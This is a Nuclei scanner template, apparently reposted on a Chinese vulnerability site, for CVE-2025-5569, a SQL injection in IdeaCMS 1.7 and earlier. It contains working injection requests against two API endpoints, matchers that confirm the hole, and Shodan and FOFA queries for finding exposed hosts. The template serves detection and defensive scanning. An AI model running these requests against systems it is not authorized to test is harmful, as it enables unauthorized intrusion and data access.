漏洞描述
IdeaCMS up to 1.7 is vulnerable to SQL injection via the field parameter in article and product query interfaces. This template uses a time-based payload to safely detect the vulnerability.
CVE-2025-5569: IdeaCMS <= 1.7 - SQL Injection
PoC代码[已公开]
id: CVE-2025-5569
info:
name: IdeaCMS <= 1.7 - SQL Injection
author: ritikchaddha
severity: critical
description: |
IdeaCMS up to 1.7 is vulnerable to SQL injection via the field parameter in article and product query interfaces. This template uses a time-based payload to safely detect the vulnerability.
reference:
- https://gitee.com/ideacms/ideacms/issues/ICBVWE#note_42016626_link
- https://nvd.nist.gov/vuln/detail/CVE-2025-5569
classification:
epss-score: 0.00433
epss-percentile: 0.6199
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-5569
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
product: IdeaCMS
shodan-query: http.favicon.hash:-1033616879
fofa-query: icon_hash:"-1033616879"
tags: cve,cve2025,ideacms,sqli
variables:
num: "999999999"
http:
- raw:
- |
GET /api/v1.index.article/getList.html?field=id,md5({{num}})&size=1&cat=3&time_stamp=1781864476 HTTP/1.1
Host: {{Hostname}}
- |
GET /api/v1.index.goods/getList.html?field=id,md5({{num}})&activity_type=hot&time_stamp=1781864476 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- 'id":1'
- 'data":'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b4d29b06406edba5757ac9729464518a931ef057d8a7d13aec1dd181c657b6670221008f6f9565b5f87d4e18ef97029fd9ac53af3e1d414b400e637d0241e691b53c59:922c64590222798bb761d5b6d8e72950